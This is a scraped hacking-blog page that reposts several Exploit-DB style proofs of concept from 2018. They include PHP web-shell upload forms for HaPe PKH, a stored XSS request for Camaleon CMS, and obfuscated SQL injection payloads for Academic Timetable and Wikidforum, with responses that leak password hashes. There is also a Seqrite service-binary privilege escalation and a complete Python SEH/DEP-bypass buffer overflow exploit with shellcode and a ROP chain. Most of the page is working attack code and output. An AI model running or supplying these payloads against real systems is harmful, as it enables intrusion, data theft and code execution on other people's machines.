# Exploit Title: HaPe PKH 1.1 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-12
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.sitejo.id
# Software Link: https://sourceforge.net/projects/hape-pkh/files/latest/download
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# File => Shell.php
# Upload Path => http://localhost/[PATH]/gambar-konten/9Shell.php
#
# $foto_ksm = array(
# array('id_foto' => '7','id_pengurus' => '','foto' => '9Shell.php','kategori_foto' => 'Foto Profile','hari' => 'Kamis',
# 'tgl' => '2018-10-12','jam' => '01:58:48'));
<form method="POST" action="http://localhost/hape-pkh/admin/modul/mod_pengurus/aksi_foto.php?module=pengurus&act=input" enctype="multipart/form-data">
<input name="id_art" type="hidden">
<input name="id_pengurus" value="" type="hidden">
<input name="fupload" size="30" accept="image/*" type="file">
<input name="kategori_foto" value="Foto Profile" checked="" type="radio">
<input name="kategori_foto" value="Depan" type="radio">
<input name="kategori_foto" value="Belakang" type="radio">
<input name="kategori_foto" value="Samping" type="radio">
<input name="kategori_foto" value="Dalam" type="radio">
<input class="button" value="Kembali" onclick="window.location.href='?module=pengurus&act=editpengurus&id=';" type="button">
<input class="button" value="Upload" type="submit">
</form>
# 2)
# File => Shell.php
# Upload Path => http://localhost/hape-pkh/gambar-konten/14Shell.php
#
# $admin = array(
# array('id_user' => '1','nama_lengkap' => '','jk' => '','tempat' => '','tl' => '0000-00-00','alamat' => '',
# 'id_desa' => '','no_telp' => '','email' => '','username' => 'admin',
# 'password' => '21232f297a57a5a743894a0e4a801fc3','level' => 'admin',
# 'blokir' => '','foto' => '14Shell.php'));
<form method="POST" enctype="multipart/form-data" action="http://localhost/hape-pkh/admin/modul/mod_user/aksi_user.php?module=user&act=update">
<input name="id_user" value="1" type="hidden">
<input name="username" value="admin" disabled="">
<input name="fupload" size="30" type="file">
<input value="Update" type="submit">
</form>
# 3)
# File => Shell.php
# Upload Path => http://localhost/hape-pkh/gambar-konten/Shell.php
#
# $kecamatan = array(array('id_kecamatan' => '1','kecamatan' => '','alamat' => '',
# 'email' => '','telp' => '','kab' => '','provinsi' => '','kodepos' => '',
# 'ket' => '','foto' => 'Shell.php'));
<form method="POST" enctype="multipart/form-data" action="http://localhost/hape-pkh/admin/modul/mod_kecamatan/aksi_kecamatan.php?module=kecamatan&act=update">
<input name="id" value="1" type="hidden">
<input class="input" name="fupload" size="30" accept="image/*" type="file">
<input class="button" value="Update" type="submit"></td></tr>
</form>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863581392
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: CAMALEON CMS 2.4 - Cross-Site Scripting
# Date: 2018-10-11
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: http://camaleon.tuzitio.com/
# Software Link : https://github.com/owen2345/camaleon-cms
# Software : CAMALEON CMS
# Version : 2.4
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : N/A
# HTTP POST Request :
POST /admin/media/upload?actions=false HTTP/1.1
Host: demo-7728.tuzitio.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo-7728.tuzitio.com/admin/profile/edit
X-CSRF-Token: D4mT8cg18Rxhpi7fYr9kRRvdCn2dSZXJMbbFeyOynVVMa3aD1pbIXDebhV3B2YwRttvYyoRLRWNf5gGlqX6fNw==
X-Requested-With: XMLHttpRequest
Content-Length: 1575324
Content-Type: multipart/form-data; boundary=---------------------------85707368319206533892056530265
Cookie: _ga=GA1.2.1784268591.1539231194; _gid=GA1.2.1333106602.1539231194; _tuzitio2_session=RHhIbzhHZTlERjFnM3ZUOTFzMnE5c295TCtVQ0QrUmttVGpCZnljaS9ibVM4UE9Ma0VDR2ppcnQzdlNPZFNobUsxdFhNSER4Z3JXYlBxN3VZcTNEbWRXS0ZldERyLzYyQ3d0S3hwSjhzWjBUMHJmaU1WeEt6MDB2QlQ0S0xkbGhUdkNwUHIrRS81ekJ3T2NnOUdnVXB5KzhPS1BnczNvaUtia2x6bmE3N2pzckRPaWI2Skc1RGhJWnZMbERRREZCSXpkU3pxdTMrRlk5WG5XYUMydk9xb1NRY2lzeWt2TWpwVjNodXJNOHFDZG9yczZXVkFMMXU2KzBZSTVqUGNkcDdjV3dBbmFuOVF3Z3BRRlFLcjFtcjVhK3hpak51VUFScVg3czQ0Z2xoOTg9LS1rczBEeWJsaDJPRkhwaTU3UHFSa2h3PT0%3D--f896a698dc0ad774de6bc953d2b9e460e916300f; auth_token=2ysW1sleUvjMJnzIqwlXag&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0&176.41.2.45
Connection: close
-----------------------------85707368319206533892056530265
Content-Disposition: form-data; name="file_upload"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")>.jpg"
Content-Type: image/jpeg
# Exploit Title: Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection
# Dork: N/A
# Date: 2018-10-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://geoffpartridge.net/
# Software Link: https://sourceforge.net/projects/timetableacademic/files/latest/download
# Version: 7.0a-7.0b
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/timetable_pdf_content.php?master=facility&id=[SQL]
-66'%20%20/*!11111unIoN*/%20%20/*!11111sElEcT*/%200x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c(/*!11111SelEct*/%20ConCat%20(@:=0%2c(/*!11111SelEct*/%20CoUnt(*) /*!11111frOm*/%20/*!11111inFORmation_schema.tables*/%20/*!11111wHerE*/(TabLE_SCheMA!=0x696e666f726d6174696f6e5f736368656d61)anD@:=ConCat%20(@%2c0x3c62723e%2c/*!11111table_name*/))%2c@))%2c0x3636%2c0x3636%2c0x3636%2c0x3636--%20%20-
http://192.168.1.27/[PATH]/timetable_pdf_content.php?master=facility&id=-66%27%20%20/*!11111unIoN*/%20%20/*!11111sElEcT*/%200x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c(/*!11111SelEct*/%20ConCat%20(@:=0%2c(/*!11111SelEct*/%20CoUnt(*)%20/*!11111frOm*/%20/*!11111inFORmation_schema.tables*/%20/*!11111wHerE*/(TabLE_SCheMA!=0x696e666f726d6174696f6e5f736368656d61)anD@:=ConCat%20(@%2c0x3c62723e%2c/*!11111table_name*/))%2c@))%2c0x3636%2c0x3636%2c0x3636%2c0x3636--%20%20-
GET /[PATH]/timetable_pdf_content.php?master=facility&id=-66%27%20%20/*!11111unIoN*/%20%20/*!11111sElEcT*/%200x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c(/*!11111SelEct*/%20ConCat%20(@:=0%2c(/*!11111SelEct*/%20CoUnt(*)%20/*!11111frOm*/%20/*!11111inFORmation_schema.tables*/%20/*!11111wHerE*/(TabLE_SCheMA!=0x696e666f726d6174696f6e5f736368656d61)anD@:=ConCat%20(@%2c0x3c62723e%2c/*!11111table_name*/))%2c@))%2c0x3636%2c0x3636%2c0x3636%2c0x3636--%20%20- HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 13 Oct 2018 01:20:12 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/timetable_pdf.php?master=facility&id=[SQL]
-66'%20%20/*!11111unIoN*/%20%20/*!11111sElEcT*/%200x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%75%73%65%5f%69%64%2c%30%78%33%61%2c%75%73%65%5f%6e%61%6d%65%2c%30%78%33%61%2c%72%6f%6c%5f%69%64%2c%30%78%33%61%2c%70%77%64%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%6d%73%5f%75%73%65%72%29%2c0x3636%2c0x3636%2c0x3636%2c0x3636--%20%20-
Pdf File: -66' __!11111unIoN__ __!11111sElEcT__ .......--.pdf
BT 34.016 451.893 Td /F2 12.0 Tf [(Notice)] TJ ET
BT 70.688 451.893 Td /F1 12.0 Tf [(: Undefined index: db_id in )] TJ ET
BT 216.104 451.893 Td /F2 12.0 Tf [([PATH]\\timetable_pdf_content.php)] TJ ET
BT 786.236 451.893 Td /F1 12.0 Tf [( on )] TJ ET
BT 34.016 437.241 Td /F1 12.0 Tf [(line )] TJ ET
BT 56.024 437.241 Td /F2 12.0 Tf [(157)] TJ ET
BT 34.016 408.189 Td /F2 12.0 Tf [(Notice)] TJ ET
BT 70.688 408.189 Td /F1 12.0 Tf [(: Undefined variable: master_name in )] TJ ET
BT 34.016 393.537 Td /F2 12.0 Tf [([PATH]\\timetable_pdf_content.php)] TJ ET
BT 604.148 393.537 Td /F1 12.0 Tf [( on line )] TJ ET
BT 646.172 393.537 Td /F2 12.0 Tf [(198)] TJ ET
BT 34.016 378.885 Td /F2 12.0 Tf [(Facility : [STAFF:Staff:VIEW:)] TJ ET
BT 34.016 364.233 Td /F2 12.0 Tf [(STUDENT:Student:VIEW:)] TJ ET
BT 34.016 349.581 Td /F2 12.0 Tf [(ADMIN:admin:ADMIN:*4ACFE3202A5FF5CF467898FC58AAB1D615029441])] TJ ET
1.000 1.000 1.000 rg
# POC:
# 3)
# http://192.168.1.27/[PATH]/server_user.php?iDisplayStart=1[SQL]
%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d%20
GET /[PATH]/server_user.php?iDisplayStart=0%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d%20 HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 13 Oct 2018 01:32:02 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1408
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 4)
# http://192.168.1.27/[PATH]/server_user.php?iDisplayStart=0&iDisplayLength=1[SQL]
%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d%20
GET /[PATH]/server_user.php?iDisplayStart=0&iDisplayLength=10%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d%20 HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 13 Oct 2018 01:42:25 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1062
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# Exploit Title: Wikidforum 2.20 - 'message_id' SQL Injection
# Exploit Author: Ihsan Sencan# Exploit Author: Ihsan Sencan
# Date: 2018-10-09
# Vendor Homepage: https://sourceforge.net/projects/wikidforum/
# Software Link: https://sourceforge.net/projects/wikidforum/files/Wikidforum-com-ed.2.20.zip/download
# Version: 2.20
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?action=member_details&id=[SQL]
%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%40%40%48%4f%53%54%4e%41%4d%45%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
# 2)
# http://localhost/[PATH]/index.php?action=message_details&type=sent_item&message_id=[SQL]
%28%55%50%44%41%54%45%58%4d%4c%28%31%2c%43%4f%4e%43%41%54%28%30%78%32%65%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%29%2c%36%36%29%29
# 3)
# http://localhost/[PATH]/index.php?action=edit_post&post_id=[SQL]
%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
# 4)
# http://localhost/[PATH]/index.php?action=create_article&article_id=[SQL]
%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%4f%55%4e%54%28%73%63%68%65%6d%61%5f%6e%61%6d%65%29%2c%30%78%32%30%32%66%32%30%34%34%36%31%37%34%36%31%36%32%36%31%37%33%36%35%37%33%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%53%43%48%45%4d%41%54%41%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
# 5)
# http://localhost/[PATH]/index.php?action=pages&page_id=[SQL]
%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%53%45%53%53%49%4f%4e%5f%55%53%45%52%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
# 6)
# http://localhost/[PATH]/index.php?action=article_main_category&cat_id=[SQL]
%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%40%40%48%41%56%45%5f%49%4e%4e%4f%44%42%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
# 7)
# http://localhost/[PATH]/admin/rpc.php?action=applications/admin/posts.php&mode=delete_post&post_id=[SQL]
%28%55%50%44%41%54%45%58%4d%4c%28%31%2c%43%4f%4e%43%41%54%28%30%78%32%65%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%29%2c%36%36%29%29
# Exploit Title: Seqrite End Point Security 7.4 - Privilege Escalation
# Date: 2018-09-13
# Exploit Author: Hashim Jawad - @ihack4falafel
# Vendor Homepage: https://www.seqrite.com/
# Tested on: Windows 7 Enterprise SP1 (x64)
# CVE: CVE-2018-17775
# Description:
# Seqrite End Point Security v7.4 installs by default to "C:\Program Files\Seqrite\Seqrite"
# with very weak folder permissions granting any user full permission "Everyone: (F)"
# to the contents of the directory and it's subfolders. In addition, the program installs handful
# of services with binaries within the program folder that run as "LocalSystem". Given
# the "Self Protection" feature (on by default) is disabled which can be done in number of ways
#(for instance, if the policy does not enforce EPS client password to change the settings any user
# can disable that feature), meaning a non-privileged user would be able to
# elevate privileges to "NT AUTHORITY\SYSTEM".
# PoC
c:\>icacls "c:\Program Files\Seqrite\Seqrite"
c:\Program Files\Seqrite\Seqrite Everyone:(OI)(IO)(F)
Everyone:(CI)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
Successfully processed 1 files; Failed processing 0 files
c:\>sc qc "Core Mail Protection"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Core Mail Protection
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Core Mail Protection
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
c:\>icacls "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
c:\>
# Exploit:
Simply replace "EMLPROXY.EXE" with your preferred payload and wait for execution upon reboot.
# Exploit Title: Wikidforum 2.20 - 'select_sort' SQL Injection
# Date: 2018-10-08
# Exploit Author: Seccops - Siber Güvenlik Hizmetleri (https://seccops.com)
# Vendor Homepage: https://sourceforge.net/projects/wikidforum/
# Software Link: https://sourceforge.net/projects/wikidforum/files/Wikidforum-com-ed.2.20.zip/download
# Version: 2.20
# Tested on: Windows 10
# Vulnerability Type: SQL Injection
# CVE: -
# Vulnerable the POST parameter in search: select_sort
# HTTP Requests for SQLi Detection:
POST /Wikidforum-com-ed.2.20/wikidforum/index.php?action=search&mode=search HTTP/1.1
Host: localhost
Content-Length: 428
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: m_username=testuser; m_passwd=21232f297a57a5a743894a0e4a801fc3
Connection: close
txtsearch=3&opt_search_select=forum&txt_author=3&search_display_field%255b%255d=post_rate&select_sort=SQL_INJECTION
# Vulnerable the POST parameter in search: parent_post_id
# HTTP Requests for SQLi Detection:
GET /Wikidforum-com-ed.2.20/wikidforum/rpc.php?action=applications/post/rpc.php&mode=post_rpc&page=1&num_records=25&parent_post_id=SQL_INJECTION HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Cookie: m_username=testuser; m_passwd=21232f297a57a5a743894a0e4a801fc3
# Vulnerable the POST parameter in search: num_records
# HTTP Requests for SQLi Detection:
GET /Wikidforum-com-ed.2.20/wikidforum/rpc.php?action=applications/post/rpc.php&mode=post_rpc&page=1&num_records=SQL_INJECTION HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Cookie: m_username=testuser; m_passwd=21232f297a57a5a743894a0e4a801fc3
# Exploit Title: Free MP3 CD Ripper 2.8 - '.wma' Buffer Overflow (SEH) (DEP Bypass)
# Date: 2018-10-08
# Exploit Author: Matteo Malvica
# Vendor: Cleanersoft Software
# Software Link: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
# Tested Version: 2.8
# Tested on OS: Windows 7 - 64bit
# Modified SEH Exploit https://www.exploit-db.com/exploits/45412/
# CVE : N/A
#
# Steps:
# 0. Turn DEP on and reboot
# I Run the python script, it will create a new file with the name "exploit.wma".
# II Start the program and click on "Convert".
# III Load the file "exploit.wma"
# IV A shiny calculator will pop-up on your desktop
#!/usr/bin/python
import struct
# msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0a\x0d\x2f' -f python
shellcode = ""
shellcode += "\xdb\xde\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x31\xba\xef"
shellcode += "\xc3\xbd\x59\x83\xc0\x04\x31\x50\x14\x03\x50\xfb\x21"
shellcode += "\x48\xa5\xeb\x24\xb3\x56\xeb\x48\x3d\xb3\xda\x48\x59"
shellcode += "\xb7\x4c\x79\x29\x95\x60\xf2\x7f\x0e\xf3\x76\xa8\x21"
shellcode += "\xb4\x3d\x8e\x0c\x45\x6d\xf2\x0f\xc5\x6c\x27\xf0\xf4"
shellcode += "\xbe\x3a\xf1\x31\xa2\xb7\xa3\xea\xa8\x6a\x54\x9f\xe5"
shellcode += "\xb6\xdf\xd3\xe8\xbe\x3c\xa3\x0b\xee\x92\xb8\x55\x30"
shellcode += "\x14\x6d\xee\x79\x0e\x72\xcb\x30\xa5\x40\xa7\xc2\x6f"
shellcode += "\x99\x48\x68\x4e\x16\xbb\x70\x96\x90\x24\x07\xee\xe3"
shellcode += "\xd9\x10\x35\x9e\x05\x94\xae\x38\xcd\x0e\x0b\xb9\x02"
shellcode += "\xc8\xd8\xb5\xef\x9e\x87\xd9\xee\x73\xbc\xe5\x7b\x72"
shellcode += "\x13\x6c\x3f\x51\xb7\x35\x9b\xf8\xee\x93\x4a\x04\xf0"
shellcode += "\x7c\x32\xa0\x7a\x90\x27\xd9\x20\xfe\xb6\x6f\x5f\x4c"
shellcode += "\xb8\x6f\x60\xe0\xd1\x5e\xeb\x6f\xa5\x5e\x3e\xd4\x59"
shellcode += "\x15\x63\x7c\xf2\xf0\xf1\x3d\x9f\x02\x2c\x01\xa6\x80"
shellcode += "\xc5\xf9\x5d\x98\xaf\xfc\x1a\x1e\x43\x8c\x33\xcb\x63"
shellcode += "\x23\x33\xde\x07\xa2\xa7\x82\xe9\x41\x40\x20\xf6"
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x00487219, # POP EDX # RETN [fcrip.exe]
0x004e9208, # ptr to &VirtualAlloc() [IAT fcrip.exe]
0x10007089, # MOV EAX,DWORD PTR DS:[EDX] # RETN [libFLAC.dll]
0x0040508e, # XCHG EAX,ESI # RETN [fcrip.exe]
0x004d9e5c, # POP EBP # RETN [fcrip.exe]
0x1000c5ce, # & push esp # ret [libFLAC.dll]
0x00445aff, # POP EBX # RETN [fcrip.exe]
0x00000001, # 0x00000001-> ebx
0x00494012, # POP EDX # RETN [fcrip.exe]
0x00001000, # 0x00001000-> edx
0x004c2d76, # POP ECX # RETN [fcrip.exe]
0x00000040, # 0x00000040-> ecx
0x00409aa4, # POP EDI # RETN [fcrip.exe]
0x00412557, # RETN (ROP NOP) [fcrip.exe]
0x639d1575, # POP EAX # RETN [vorbis.dll]
0x90909090, # nop
0x00493619, # PUSHAD # RETN [fcrip.exe]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
nop_block = '\x90' * 8
total_buffer = 4444
offset = "A" * 3804
SEH = struct.pack('<L',0x639d2ad8) # 0x639d2ad8 # ADD ESP,45C # XOR EAX,EAX # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [vorbis.dll] **
padding = "B" * (total_buffer - len(SEH) - len(offset))
payload = offset + nop_block + rop_chain + nop_block * 2 + shellcode + "\xCC" * 4 + SEH + padding
try:
f=open("exploit.wma","w")
print "[+] Creating %s bytes of tiramisù payload..." %len(payload)
f.write(payload)
f.close()
print "[+] High carb exploit created!"
except:
print "Dessert cannot be created"
/*
The BailOutOnInvalidatedArrayHeadSegment check uses the JavascriptArray::GetArrayForArrayOrObjectWithArray method to check whether the given object is an array. If it's not an array, it will decide to skip the check which means that no bailout will happen. The JavascriptArray::GetArrayForArrayOrObjectWithArray method determines it by comparing the vtable of the given object like the following.
if(vtable == VirtualTableInfo<JavascriptArray>::Address)
{
*arrayTypeIdRef = TypeIds_Array;
}
else if(vtable == VirtualTableInfo<JavascriptNativeIntArray>::Address)
{
*arrayTypeIdRef = TypeIds_NativeIntArray;
}
